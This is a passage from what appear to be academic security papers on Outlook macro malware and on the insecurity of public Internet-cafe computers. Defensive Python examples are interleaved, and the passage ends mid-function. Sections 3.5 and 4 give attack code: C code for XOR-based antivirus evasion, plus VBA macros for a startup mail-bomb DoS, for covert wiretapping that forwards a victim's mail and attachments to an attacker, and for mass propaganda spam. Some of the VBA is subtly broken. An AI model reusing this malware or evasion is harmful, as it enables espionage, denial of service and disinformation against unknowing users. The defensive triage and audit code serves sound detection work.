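    m = re.search(rb"/OpenAction\s*(?:(<<.*?>>)|(\d+)\s+\d+\s+R)", data, re.DOTALL)
    if not m:
        return False
    if m.group(2):                     # indirect reference: follow it to the object body
        target = load_objects(data).get(int(m.group(2)), b"")
    else:                              # inline dictionary (cut at the first >>, enough here)
        target = m.group(1)
    return re.search(rb"/S\s*/JavaScript\b", target) is not None


def triage(data: bytes) -> Dict[str, object]:
    """Summarise why a file deserves a closer look; never a verdict on its own."""
    counts = count_keywords(data)
    reasons: List[str] = []
    if open_action_runs_javascript(data):
        reasons.append("JavaScript runs automatically on open (/OpenAction -> /S /JavaScript)")
    if counts["/Launch"]:
        reasons.append("/Launch action present (can start an external program)")
    if counts["/EmbeddedFile"]:
        reasons.append("embedded file present (possible dropped payload)")
    if counts["/AA"]:
        reasons.append("additional actions (/AA) bound to document or page events")
    # Compressed object streams hide dictionaries from this byte-level scan.
    inconclusive = bool(counts["/ObjStm"] or counts["/FlateDecode"])
    return {"counts": counts, "reasons": reasons,
            "suspicious": bool(reasons), "inconclusive": inconclusive}


# Constructed samples (not real malware), modelled on the object layout of section 2.1:
# the catalog's /OpenAction points at object 27, whose /JS script lives in stream 28.
SAMPLE_OPENACTION_JS = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 27 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
27 0 obj << /S /JavaScript /JS 28 0 R >> endobj
28 0 obj << /Length 67 >>
stream
app.alert({ cMsg: "Hello World", cTitle: "Acme Testing Service" });
endstream
endobj
trailer << /Root 1 0 R >>
%%EOF
"""
# The same document with the action name hex-escaped, a trivial evasion of a naive grep.
SAMPLE_ESCAPED = SAMPLE_OPENACTION_JS.replace(b"/S /JavaScript", b"/S /J#61vaScript")
# A document with no actions at all.
SAMPLE_BENIGN = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def main(argv: List[str]) -> None:
    files = argv[1:]
    inputs = [(p, open(p, "rb").read()) for p in files] if files else [
        ("constructed: openaction-js", SAMPLE_OPENACTION_JS),
        ("constructed: hex-escaped", SAMPLE_ESCAPED),
        ("constructed: benign", SAMPLE_BENIGN)]
    for name, data in inputs:
        result = triage(data)
        print(name, "SUSPICIOUS" if result["suspicious"] else "no findings",
              "(inconclusive: compressed objects)" if result["inconclusive"] else "")
        for reason in result["reasons"]:
            print("  -", reason)


if __name__ == "__main__":
    main(sys.argv)
```

Keyword counting is only conclusive on uncompressed content: when /ObjStm or /FlateDecode appears, the result is flagged inconclusive because the dictionaries may live inside compressed object streams, and a real parser (pdf-parser from the same e-book, for instance) is needed to inflate them first. Hex-escaped names are normalised before matching so that the /J#61vaScript trick does not defeat the scan.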
3.4 Modification of the macro security setting
To conduct our attacks, it is necessary to modify the relevant registry keys and to set the value "Level" to 1.
For that purpose, we use three functions: RegCreateKeyEx( ), RegSetValueEx( ) and RegCloseKey( ). The function RegCreateKeyEx( ) creates the key "Security" if it does not exist in the registry, otherwise it opens it. The function RegSetValueEx( ) modifies the value of the variable "Level" to set it to 1. The function RegCloseKey( ) closes the key "Security". The corresponding code to modify the Outlook macro security level is given hereafter. It is worth mentioning that this piece of code does not trigger any antiviral software alert.
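Section 2.2 gives the registry location and the meaning of each Level value, and section 3.4 describes how the attack lowers it to 1; the corresponding defensive control is to audit that value on the user's machine. The script below is an added example and is not part of the paper: it reads the text produced by reg export (which Windows writes as UTF-16) or falls back to an embedded, constructed sample, and reports any Outlook Security\Level below 3. The function and constant names are ours; the version-to-product mapping covers only the 12.0 and 14.0 keys named in the paper, other versions are reported generically under the assumption that they use the same key layout.

```python
import re
import sys
from typing import Dict, List, Tuple

# Outlook macro security levels as listed in section 2.2 (registry value == level).
LEVEL_MEANING = {
    4: "no warnings, all macros disabled",
    3: "warnings for signed macros only, unsigned macros disabled",
    2: "warnings for all macros",
    1: "no security check for macros (not recommended)",
}

# Office version numbers named in the paper; other versions are reported generically.
OUTLOOK_VERSIONS = {"12.0": "Outlook 2007", "14.0": "Outlook 2010"}

KEY_RE = re.compile(
    r"^\[HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\(\d+\.\d+)\\Outlook\\Security\]$",
    re.IGNORECASE,
)
LEVEL_RE = re.compile(r'^"Level"=dword:([0-9a-fA-F]{8})$', re.IGNORECASE)


def parse_outlook_levels(reg_text: str) -> Dict[str, int]:
    """Return {office_version: Level} for every Outlook Security key in a .reg export."""
    levels: Dict[str, int] = {}
    current = None  # version of the Outlook Security key we are inside, if any
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("["):        # a key header starts a new section
            m = KEY_RE.match(line)
            current = m.group(1) if m else None
            continue
        if current is None:
            continue
        m = LEVEL_RE.match(line)
        if m:
            levels[current] = int(m.group(1), 16)
    return levels


def audit_levels(levels: Dict[str, int], minimum: int = 3) -> List[Tuple[str, int, str, str]]:
    """Classify each Level: OK (>= minimum), WEAK (below it) or UNEXPECTED (not 1..4)."""
    findings = []
    for version, level in sorted(levels.items()):
        product = OUTLOOK_VERSIONS.get(version, f"Outlook (Office {version})")
        if level not in LEVEL_MEANING:
            status = "UNEXPECTED"
        elif level >= minimum:
            status = "OK"
        else:
            status = "WEAK"
        findings.append((product, level, LEVEL_MEANING.get(level, "undocumented value"), status))
    return findings


# Constructed sample of a 'reg export HKCU\Software\Microsoft\Office' dump (not real data):
# Outlook 2007 has been lowered to Level 1, Outlook 2010 is still at Level 3. The Word key
# is deliberately present and ignored, since its values do not map to levels the same way.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Outlook\Security]
"Level"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Security]
"Level"=dword:00000002

[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Security]
"Level"=dword:00000003
"""


def main(argv: List[str]) -> int:
    """Exit status 1 when at least one Outlook level is weak or unexpected."""
    if len(argv) > 1:
        with open(argv[1], encoding="utf-16") as fh:   # reg export writes UTF-16 with a BOM
            text = fh.read()
    else:
        text = SAMPLE_REG
    worst = 0
    for product, level, meaning, status in audit_levels(parse_outlook_levels(text)):
        print(f"{status:10} {product}: Level {level} ({meaning})")
        if status != "OK":
            worst = 1
    return worst


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it against reg export HKCU\Software\Microsoft\Office office.reg taken on the workstation; a Level of 1 on a machine whose users never lowered it themselves is the trace that section 3.4 leaves behind, and the same check belongs in any baseline that also hashes the user's VbaProject.OTM from section 2.3.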
3.5 Anti-antiviral mechanisms
For a better protection against antivirus detection, we have used a number of obfuscation techniques. The strategy we have chosen is to operate at the binary level. The macro is embedded in the binary file in encrypted form to avoid being detected by antivirus software. The infection process then first has to decipher the macro in memory and to overwrite Outlook's original macro with the malicious macro.
The macro is enciphered using one of the simplest methods: the constant XOR function. In Dechaux et al. (2010a) it has been shown how this lame method was still successful at defeating all antivirus software. The encryption key is not stored inside the binary file, to prevent static analysis. Instead we use an environmental key as suggested in (Filiol 2007). It is generated only whenever needed. From the perspective of a malware analyst, the only way to recover the key is either to use brute force or to conduct a dynamic analysis, following the execution step by step.
Here is the main function for the extraction of the macro file:
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

/* envGenKey() and cypher() belong to the authors' tool and are not reproduced in
   the paper; the prototypes below are inferred from the calls in main(). */
unsigned char *envGenKey(const char *path, unsigned char *pkey);
char *cypher(const char *data, unsigned char *pkey);

int main(int ac, char **av)
{
    int fd, rt, size;
    char *stringToDecipher = "Hello world, we had a lovely sunny day";
    char *file;
    unsigned char *pkey = NULL;
    if (ac < 2)
    {
        puts("USAGE: ECIW -e stringToCipher | ECIW -d stringToDecipher outputFile");
        return -1;
    }
    /* Generating the environmental key */
    pkey = envGenKey("/Applications", pkey);
    if (pkey == NULL)
        return -1;
    puts("Key Generated");
    /* choosing the mode, cipher or decipher */
    if (strncmp(av[1], "-e", 2) == 0)
    {
        puts("CIPHER MODE");
        /* the cipher mode */
        if (ac != 3)
        {
            puts("USAGE: ECIW -e stringToCipher");
            return -1;
        }
        /* we give the string to cipher on the command line */
        file = cypher(av[2], pkey);
        if (file == NULL)
        {
            puts("ERROR ciphering process");
            return -1;
        }
        printf("The encrypted data is ==> %s\n", file);
    }
    /* Decipher the string */
    else if (strncmp(av[1], "-d", 2) == 0)
    {
        puts("DECIPHER MODE");
        if (ac != 4)
        {
            puts("USAGE: ECIW -d stringToDecipher outputFile");
            return -1;
        }
        if (ac == 3) /* unreachable after the ac != 4 check above; kept as in the paper */
            file = cypher(stringToDecipher, pkey);
        else
            file = cypher(av[2], pkey);
        fd = open(av[3], O_WRONLY);
        if (fd == -1)
            return -1;
        size = strlen(file);
        rt = write(fd, file, size);
        close(fd);
        if (rt == -1)
            return -1;
    }
    return 0;
}
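The remark above that a constant-XOR key must be recovered by brute force or by dynamic analysis is easy to demonstrate from the analyst's side, and it shows why this obfuscation only defeats signature matching, not an analyst. The Python below is an added example, not the authors' tool (whose envGenKey() and cypher() are not on the page): it brute-forces a single-byte XOR key by scoring each of the 256 candidate plaintexts for printable text and for the VBA event-handler names used in section 2.3. The obfuscated sample is constructed here from a harmless macro skeleton with key 0x5A; the function names are ours.

```python
from typing import Tuple

# Strings that an Outlook macro of the kind shown in section 2.3 must contain.
VBA_MARKERS = [b"Private Sub", b"End Sub", b"Application_", b"Dim ", b"Declare"]


def xor_bytes(data: bytes, key: int) -> bytes:
    """Constant (single-byte) XOR, the obfuscation the paper describes."""
    return bytes(b ^ key for b in data)


def score_plaintext(candidate: bytes) -> int:
    """Higher is more VBA-like: printable text plus a bonus per macro keyword found."""
    printable = sum(1 for b in candidate if 32 <= b < 127 or b in (9, 10, 13))
    markers = sum(candidate.count(m) * 20 for m in VBA_MARKERS)
    return printable + markers


def recover_single_byte_xor(blob: bytes) -> Tuple[int, bytes]:
    """Try all 256 keys and keep the candidate that scores best."""
    best_key = max(range(256), key=lambda k: score_plaintext(xor_bytes(blob, k)))
    return best_key, xor_bytes(blob, best_key)


def looks_like_vba_macro(plain: bytes) -> bool:
    """Cheap structural check on a recovered candidate."""
    return b"Private Sub" in plain and b"End Sub" in plain


# Constructed sample: a harmless macro skeleton obfuscated with key 0x5A (not the paper's payload).
SAMPLE_MACRO = (b"Private Sub Application_Startup()\r\n"
                b"    On Error Resume Next\r\n"
                b"    Dim Repertoire\r\n"
                b"End Sub\r\n")
SAMPLE_BLOB = xor_bytes(SAMPLE_MACRO, 0x5A)


def analyse(blob: bytes) -> Tuple[int, bool]:
    """Recover the key and say whether the result reads as a VBA macro."""
    key, plain = recover_single_byte_xor(blob)
    return key, looks_like_vba_macro(plain)


if __name__ == "__main__":
    key, is_macro = analyse(SAMPLE_BLOB)
    print(f"recovered key 0x{key:02x}, macro recognised: {is_macro}")
```

Keyword scoring is what makes this work where byte-frequency statistics would not: a macro is short, so finding "Private Sub" and "End Sub" in a candidate is a far stronger signal than letter frequencies. A longer repeating key needs a key-length guess first (for instance by Hamming distance between blocks) and then this routine per key position; a key derived from the host at run time, as the environmental key of section 3.5 is, is best captured with the dynamic analysis the authors mention, because the scan has no host to derive it from.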
4. Three operational attack scenarios
Let us now present how to use the previous attack techniques in real cases.
4.1 Email server DoS
This attack is very simple; we are going to send an infinite number of emails from a target user's client starting at a specific date. We chose for this example September 11th, 2011, ten years after the Twin Towers bombing. The Denial of Service (DoS) will strike either a governmental email server or a stock exchange email server in order to block the economy.
We get the current date of the system and compare it with September 11th. If it matches or exceeds the due date, we create an infinite number of emails with a subject, a body, and a specific address. Of course we delete them all so that the user does not notice anything (secure deletion of any evidence to fool any forensics attempt).
For the DoS to be effective, we have to infect thousands of different clients because every email on the same client is sent one after the other. Thus our attack targets one million customers, even more, who will send an infinite number of emails, every day from September 11th on.
Our code is split into two parts, the initialization step and the payload. In the initialization part, there is error handling to avoid alerting the user, a variable definition and then the definition of the email object type "Outlook.Application". In the payload part, we have the recovery of the system date, the comparison with the date that we fixed, and then the sending of emails. This macro will run whenever the Outlook application is launched (use of the "Application_Startup( )" mode).
Private Sub Application_Startup()
    On Error Resume Next
    Dim ol As New Outlook.Application
    Dim olmail As MailItem
    Dim i As Integer
    Dim ActualDate As Date
    ' Object definition
    Set ol = CreateObject("Outlook.Application")
    ActualDate = Date
    ' If the date is September 11th or newer
    If (ActualDate >= "11/09/2011") Then
        While 1
            ' Mail definition
            Set mail = ol.CreateItem(olMailItem)
            ' Mail creation
            With olmail
                .To = "email_address"
                .Subject = "email_subject"
                .body = "email_body"
                .DeleteAfterSubmit = True
                .Send
            End With
            Set olmail = Nothing
        Wend
    End If
End Sub
Figure 3: eMail server Denial of Service (DoS)
4.2 Email wiretapping
Here the attacker wants to access the target user's email in an illegitimate way (Figure 4). First of all, every email in the inbox as well as those sent by the victim is duplicated whenever Outlook is started up. All those email copies can be saved as a txt file which remains invisible to the user. This text file (the stolen emails) is then sent by email to the attacker's email address. This part will be executed through the "Application_StartUp( )" mode.
Whenever an email is sent or received by the victim, a copy is sent to the attacker in a transparent way (use of the "Application_ItemSend( )" and "Application_NewMail( )" modes).
Figure 4: eMail wiretapping
Here follows the source code of the attack (extract).
' Function launched when a mail is sent
Private Sub Application_ItemSend(ByVal Item As Object, Cancel As Boolean)
    On Error Resume Next
    i = 0
    Sleep 1000
    ' For each mail in the Sent folder
    For Each myItem In myInbox.Items
        If i = 0 Then
            Set myAttachments = myItem.Attachments
            ' Get all information
            body = "From: " & myItem.SenderName & _
                   " < " & myItem.SenderEmailAddress & " >" & Chr(13) _
                   & "Sent: " & myItem.SentOn & Chr(13) _
                   & "To: " & myItem.To & Chr(13) _
                   & "Cc: " & myItem.CC & Chr(13) _
                   & "Subject: " & myItem.Subject & Chr(13) & Chr(13) _
                   & myItem.body
            ' Get Attachments
            If myAttachments.Count > 0 Then
                'for all attachments do...
                For j = 1 To myAttachments.Count
                    ' save them to destination
                    myAttachments(j).SaveAsFile Folder_PJ_Sent & _
                        myAttachments(j).DisplayName
                Next j
            End If
            Set olmail = ol.CreateItem(olMailItem)
            ' Mail creation
            With olmail
                .To = "email_address"
                .Subject = myItem.Subject
                .body = body
                If myAttachments.Count > 0 Then
                    .myAttachments.Add Folder_PJ_Received & _
                        myAttachments(j).DisplayName
                End If
                .DeleteAfterSubmit = True
                .Send
            End With
            Set olmail = Nothing
            ' Set up the next mail
            Set myItem = myItems.GetNext
            i = i + 1
            Sleep 1000
        End If
    Next myItem
End Sub
' Function launched when a mail is received
Private Sub Application_NewMail()
    On Error Resume Next
    i = 0
    Sleep 1000
    ' For each mail in the Inbox folder
    For Each myItem In myInbox.Items
        If i = 0 Then
            Set myAttachments = myItem.Attachments
            i = i + 1
            Sleep 1000
        End If
    Next myItem
End Sub
' Function launched when the application is launched
Private Sub Application_StartUp()
    On Error Resume Next
    i = 0
    For Each myItem In myInbox.Items
        Set myAttachments = myItem.Attachments
        i = i + 1
        Sleep 1000
    Next myItem
    i = 0
    For Each myItem2 In myInbox2.Items
        Set myAttachments2 = myItem2.Attachments
        i = i + 1
        Sleep 1000
    Next myItem2
End Sub
4.3 Propaganda and information operations
In this attack, we are going to send one thousand propaganda emails whenever the user sends an email. As an operational example, let us consider a US senior officer in Afghanistan. He uses emails to keep in touch with his family. Once infected, whenever he sends an email, at the same time thousands of emails are sent to Muslim citizens in an invisible way. These emails contain propaganda, anti-Muslim contents...
Here follows the corresponding source code (extract):
Private Sub Application_ItemSend(ByVal Item As Object, Cancel As Boolean)
    On Error Resume Next
    Dim ol As New Outlook.Application
    Dim olmail As MailItem
    Dim i As Integer
    Dim Tableau(1 To 1000) As String
    Tableau(1) = "email_address1"
    ' ...
    Tableau(1000) = "email_address1000"
    ' Object definition
    Set ol = CreateObject("Outlook.Application")
    For i = 1 To 1000 Step 1
        Set olmail = ol.CreateItem(olMailItem)
        ' Mail creation
        With olmail
            .To = Tableau(i)
            .Subject = "email_subject"
            .Body = "email_body"
            .DeleteAfterSubmit = True
            .Send
        End With
        Set olmail = Nothing
    Next i
End Sub
5. Conclusion
From this study, we could realize how ridiculously easy it is to infect a user's computer and to exploit his email client without him knowing it, and how such unsophisticated cyber-attacks could inflict major damage on nations' security: propaganda, espionage and denial of service are some examples of the new threats that such basic attacks can carry out. One can imagine the interest of such tools in cyber warfare to collect intelligence in support of terrorist operations and to communicate and disseminate propaganda.
What is worrying is that the requisite level of knowledge and skills needed to implement this technique is amazingly low while the nuisance potential of this kind of cyber attack is very high.
The fact that such attacks can be launched by the man in the street and that the cyber attack tools used (emails and office documents) are very common among the population will inevitably increase the scope and the scale of the attack. It will make attacks easy to launch and difficult to trace.
References
Adobe Developer Support (2008) Document management – Portable document format – Part 1: PDF 1.7, http://www.adobe.com/content/dam/Adobe/en/devnet/pdf/pdfs/PDF32000_2008.pdf.
Adobe Developer Support (2007) Adobe Acrobat SDK 8.1 JavaScript for Acrobat API Reference for Microsoft Windows and Mac OS, http://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/js_api_reference.
Blonce, A., Filiol, E. and Frayssignes, L. (2008) Portable Document Format (PDF) Security Analysis and Malware Threats, Black Hat Europe, http://www.blackhat.com/presentations/bh-europe-08/Filiol/Presentation/bh-eu-08filiol.pdf.
Dechaux, J., Filiol, E. and Fizaine, J.P. (2010) Office documents: New Weapons of Cyberwarfare, Hack.Lu, Luxembourg, http://archive.hack.lu/2010/Filiol-Office-Documents-New-Weapons-of-Cyberwarfare-paper.pdf.
Dechaux, J., Fizaine, J.P., Griveau, R. and Jaafar, K. (2010) New Trends in Malware Sample-Independent AV Evaluation Techniques with Respect to Document Malware, Eicar 2010, France.
Filiol, E. (2007) Techniques virales avancées, IRIS International Series, Springer Edition.
Saumil, S. (2010) Exploit Delivery, Hack.Lu, Luxembourg, http://archive.hack.lu/2010/Saumil-Exploit-Deliveryslides.pdf.
Stevens, D. (2010) Analyzing Malicious PDF Files, Hack.Lu, Luxembourg, http://blog.didierstevens.com/2010/09/26/free-malicious-pdf-analysis-e-book.
The Computer Security of Public/Open Computer Spaces: Feedback of a Field Study in Europe
Eric Filiol
ESIEA - Operational virology and cryptology laboratory, France
filiol@esiea.fr
https://sites.google.com/site/ericfiliol/
Abstract: Many public places offer free or low-cost access to the Internet: Internet cafes, hotels (especially high quality hotels). These places experience a large attendance, especially near sites like railway stations, airports, international conference lounges... A number of questions then arise regarding the computer security aspects: what kind of users visit these places and use those Internet accesses, what security risks do they face and, especially, how could ill-intentioned actors (terrorists, organized crime, spies...) use those accesses to harm users and possibly a company network. This article presents the results of a wide study conducted in Europe during the second half of 2010 in these "public/open Internet places". The report is alarming. Not only do users take an enormous risk for themselves, they also seriously jeopardize their businesses. This study indeed reveals that, contrary to the popular belief according to which most users of these sites are tourists or individuals only, the majority of users of these sites are professionals, employees of large firms who moreover are the custodians of high power or of high responsibility (CEO, CSO or CTO of large companies) or even of private data of third-party people (lawyers, physicians...). Even worse, the lack of real security on all these open Internet accesses can be exploited and perverted, after a suitable and necessary intelligence phase, to conduct cyber attacks against companies, government offices and bodies, critical infrastructure..., thus causing extreme prejudice.
Keywords: computer security, malware, intelligence gathering, computer network attack (CNA), computer network operation (CNO), computer terrorism
1. Introduction
Many open/public computer spaces are freely available and offer direct access to the Internet: Internet cafes, Internet computers in hotels (especially top-quality hotels), airports, railway stations, international conference lounges... In a context of an ever-growing need for security and control, especially with respect to terrorist activities and economic intelligence (active and passive), a number of questions arise:
- What is the overall security of those open computer spaces? Is it possible to mount national or worldwide attacks from them in an untraceable and uncontrolled way?
- As far as the security of companies is concerned, is it possible to target them easily, perform active and passive economic intelligence operations against them, and bypass all their system and network security?
Over six months we analyzed the security of many public/open computer spaces in Europe (mainly France, Belgium, Luxembourg, Germany, Greece and the Netherlands; 247 computers analyzed in total) and tried to think as terrorists or spies would. Our general conclusions are sobering:
- The overall security of those open/public spaces is extremely weak. No control at all is performed to monitor who is using the Internet facilities or what kind of actions they perform. Mounting national or worldwide attacks through the Internet from them is therefore trivial. In a context of terrorism, this can have a dramatic impact.
- The vast majority of users are not ordinary users or innocent tourists; on the contrary, they are decision-makers and employees of large firms who hold positions of high power or responsibility (CEO, CSO or CTO of large companies...) or who are custodians of third parties' private data (lawyers, physicians...). We observed that most of the time they violate one or more basic computer security rules, regarding both data security and their own company network.
- Targeting one or more companies to perform intelligence operations against them, or to mount internal attacks against their networks and computer resources while bypassing many of their protections, is very easy as well. In particular, we observed that many decision-makers use those public spaces in a very insecure way, jeopardizing their company's assets and existence.
In this paper we present the detailed results of this field study, with many illustrative examples and attack scenarios we have tested or explored, and draw a number of recommendations towards better security.
Eric Filiol
The paper is organized as follows. Section 2 presents the context, protocol and tools of our study. Section 3 reports the level of (in)security we observed; as a general conclusion, the computer security level is very low. Section 4 addresses intelligence gathering in those open/public computer spaces, shows how sensitive the data we collected were, and shows how the collected data can be misused to prepare further targeted computer attacks against companies. Section 5 explains how the computer (in)security in place can be exploited and perverted to prepare and mount indirect computer attacks against remote and sensitive computer facilities such as critical infrastructure or protected company LANs. Section 6 presents an overall scenario that ties our different results together. We then conclude by addressing how to protect against this particular risk.
2. Context, protocol and tools of the study
2.1 The "theoretical" context
A number of Information Security Management Systems (ISMS) and standards exist to evaluate security risk. Among the widely used ones:
- The French Government EBIOS risk analysis method (DCSSI, 2000), which allows evaluating and acting on risks relative to information systems security and proposes a security policy adapted to the needs of an organization. The five steps of the EBIOS method are the context study, the expression of security needs, the risk study, the identification of security objectives, and the determination of security requirements.
- The "ISO27k" standards (ISO/IEC 27000 series), which provide good-practice guidance on designing, implementing and auditing Information Security Management Systems to protect the confidentiality, integrity and availability of the information on which we all depend.
The main drawback and limitation of these security and risk analysis methods is that their approach is far too system/infrastructure centric. They consider only technical aspects; the "intelligence" approach, and more generally the attacker's vision and methods, are never taken into account. More worryingly, the wider environment of the systems/infrastructures analyzed, especially its dynamic evolution, is almost never considered.
Our study aims at providing a different view. Our goal is to show that the attacker's vision, in a context of intelligence operations and cyberwarfare preparation and planning, has a tremendous impact on overall security.
2.2 Study protocol and tools
The purpose of this study, which was conducted from May 2010 to November 2010 for SECALYS Ltd (http://www.secalys.fr), a company specializing in business and economic intelligence, was to determine the risk factors and the risk level related to the use of open Internet access in public areas (Internet cafes, Internet computers in hotels, airports, railway stations, international conference lounges...). The idea was to stand in the shoes of an attacker (a spy, a mafia group member, a terrorist...) who wishes to collect intelligence or to target a particular company (industrial espionage, cyber attacks...). In particular, the approaches considered keep in mind that the word "intelligence" contains two main ideas: a passive component (information gathering, which consists in collecting more or less sensitive data in more or less open environments) and an active and/or offensive component (intrusion, compromise, attack, physical human operations...). This duality of action is most of the time forgotten behind the buzzword "economic intelligence". Intelligence techniques and operations do not care about ethics, difficulty or any kind of limitation or regulation; they consider only efficiency and success (Qiao & Wang, 1999).
The analyses and computer actions/operations we undertook, tested or planned (see hereafter) sit at roughly level 3 on a complexity scale ranging from 1 to 10. They are therefore rather unsophisticated techniques that can easily be performed by a large number of attackers with limited knowledge of computer hacking and attacks (script kiddies, would-be spies working for private intelligence companies...). Our study has shown that more sophisticated techniques are bound to succeed every time.
Alongside a few home-made, custom auditing programs (equivalents can easily be found on the Internet), we used a rather limited kit of tools:
- A USB stick containing portable applications:
  - An efficient yet light antivirus program, Dr.Web CureIt (http://www.freedrweb.com/cureit/?lng=en). This tool was chosen because, aside from a very good detection rate, it is the most transparent one with respect to the system: whenever another security product (e.g. an alternative antivirus) is present, running CureIt neither triggers any alert nor causes system slowdown or instability.
  - A powerful, multi-format recovery tool for deleted or formatted data. We used PhotoRec (http://www.cgsecurity.org/wiki/PhotoRec_FR), a free, open tool written by Christophe Grenier, which in our experience is the most powerful tool in this category.
  - A hex editor, FileAlyzer (http://www.safer-networking.org/fr/filealyzer/index.html), with content analysis and interpretation capabilities.
- A set of hardware keyloggers (PS/2, USB...).
To evaluate the offensive part, we analyzed the computer security environment in place (nature and versions of the protection software installed, configuration settings...) and tested the efficiency of the possible attacks by performing them in our laboratory with real malicious code (malware, shellcode, exploits...) on exact clones of the real computers. However, to ensure the operational realism of those attacks in situ, we actually carried out the data recovery steps and the operations needed to obtain administrator and system privileges on the real machines. Sensitive data were deleted after the study.
In each place where a large number of computers were available (as in cyber cafes), we analyzed a random subset of those computers rather than a single one, in order to get a more operational point of view (sampling technique).
For a few computers that proved interesting with regard to the data collected or to their frequent, regular users, we installed an alternative antivirus (e.g. Dr.Web) in dynamic (on-access) mode, after deactivating the one in place, if any. Other software (keyloggers, Trojan horses) could have been installed in exactly the same way. We then returned to analyze the results at different time intervals.
We sought to evaluate the following points:
- First, can we recover data (still present or deleted) from previous users' sessions? Can these data be sensitive or confidential (in other words, are those computers used mainly for professional purposes or not)? What is the level of sensitivity of the data collected or recovered?
- How secure are these open Internet computers (antivirus, configuration of hidden areas, system directories accessible or not...)? In other words, can we carry out attacks from those computers and, even worse, can we reconfigure or change them in such a way that we can target, infect and spy on the users who use the computer after us?
For this last point (offensive and targeted action against a given user/company), it is worth stressing that a classical, human intelligence analysis must be performed to make this step effective. This particular point is discussed in Section 5.
3. The actual computer security of open/public computer spaces
We observed a total lack of security on all the computers we analyzed. The few configurations and security products in place absolutely do not protect these systems against an attacker of low or medium technical level. The systems are often equipped with an antivirus (about 75% of computers are protected) which is often invisible to the user but badly configured: for instance, we systematically managed to access the scan logs, and we could easily uninstall the products or manipulate their configuration (iAWACS, 2009 & 2010). The overall distribution of the antivirus products found on the systems is given in Figure 1. The most important point is that the degree of protection is inversely proportional to a product's share of that distribution: McAfee and Symantec were the least efficient products in our tests (iAWACS, 2009 & 2010) while being the most widely installed.
In a significant number of instances, CureIt detected infections where the antivirus in place had failed (especially with respect to Conficker variants). It is also possible, by analyzing the scan logs, to determine with great precision what kind of antivirus protection is (or is not) installed on the users' corporate network. For example, analysis of the metadata in Office documents showed that infected documents had been opened on a machine in a company LAN without being detected. All this information is critical during the intelligence step that prepares a computer network operation (Filiol, 2009).
Where we installed an alternative antivirus (on computers regularly used by the same people; see Sections 4 and 5), we managed to infer other critical information about the antivirus software in place on their business or home computers. It is important to remember that home computing is the first point of entry for attacks against a corporate network (Filiol, 2009).
Figure 1: Distribution of antivirus software installed in open/public Internet accesses (in %; total number of computers analyzed with an antivirus installed = 186)
The global protection (security software, visibility and strength of the configuration in terms of security) is bad, or even almost non-existent. It is easy, in many ways and without even using vulnerabilities or sophisticated code, to gain system privileges and then install malware that will infect subsequent users. Virtually no measure is taken against the installation of hardware keyloggers (it is even possible to easily retrieve the admin password; we only played this step partially, so as to stay within a strictly legal framework, and for ethical reasons we will not give the method here). It follows that infecting users and their company network in an anonymous and untraceable way is more than easy. Launching an attack with malware such as Stuxnet or Conficker (and thereby falsely incriminating a country or a company) is very easy. Additionally, we observed that launching portable applications from a USB key is also very easy.
4. Intelligence gathering operations in open/public computer spaces
Collecting data from previous users' sessions (when still present on the hard disk) or recovering them (when erased) is very easy, even when some technical measure has been taken (such as invisible or hidden directories). We were able to recover several gigabytes of data. What is astonishing is the sensitivity of the data found: economic data (financial audits of groups or corporations, for example), political data (e.g. a document of the High Court of Justice of Europe, see Figure 2), legal data, private data (we found a complete set of documents enabling identity theft: tax notices, passports, identity cards...) and even, sometimes, confidential documents.
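As an added example (this is not the paper's code, nor PhotoRec's), the following Python shows the core technique that PhotoRec-style recovery relies on: deleting a file only frees its blocks, so scanning the raw bytes of the disk for known header/footer signatures brings the content back regardless of the file system's state. The disk image below is constructed in memory; the signatures are real, the file bodies are placeholders.

```python
"""Signature-based file carving over a raw disk image.

Added example (not the paper's own tooling): the study used PhotoRec to
recover deleted files; this shows the underlying technique, scanning raw
bytes for header/footer pairs, on a small constructed image.
"""

# Header/footer signatures for a few common types (a real carver knows many more).
SIGNATURES = {
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9"),
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
    "pdf": (b"%PDF-", b"%%EOF"),
}

# Upper bound on a carved file; stops a missing footer from swallowing the image.
MAX_FILE_SIZE = 16 * 1024 * 1024


def _find_end(image, ftype, header, footer, start, window_end):
    """Return the end offset of the file that starts at `start`, or -1."""
    # Never run past the next header of the same type.
    next_header = image.find(header, start + len(header), window_end)
    limit = next_header if next_header != -1 else window_end
    if ftype == "pdf":
        # A PDF saved incrementally carries several %%EOF markers; the last
        # one before the next header closes the file (and keeps old revisions).
        footer_at = image.rfind(footer, start, limit)
    else:
        footer_at = image.find(footer, start + len(header), limit)
    return -1 if footer_at == -1 else footer_at + len(footer)


def carve(image, max_size=MAX_FILE_SIZE):
    """Return [(offset, type, data), ...] for every file found by signature."""
    found = []
    for ftype, (header, footer) in SIGNATURES.items():
        pos = 0
        while (start := image.find(header, pos)) != -1:
            end = _find_end(image, ftype, header, footer, start,
                            min(len(image), start + max_size))
            if end == -1:
                pos = start + 1          # header without footer: skip it
                continue
            found.append((start, ftype, image[start:end]))
            pos = end
    found.sort(key=lambda f: f[0])
    return found


def build_sample_image():
    """Constructed 'deleted files in unallocated space' image for the demo."""
    filler = b"\x00" * 512
    jpeg = b"\xff\xd8\xff\xe0\x00\x10JFIF" + b"<pixel data>" + b"\xff\xd9"
    pdf = (b"%PDF-1.4\n1 0 obj<</Type/Catalog>>endobj\n"
           b"trailer<</Root 1 0 R>>\n%%EOF\n"
           b"2 0 obj<</Note(added by a later save)>>endobj\n"
           b"trailer<</Root 1 0 R/Prev 9>>\n%%EOF\n")
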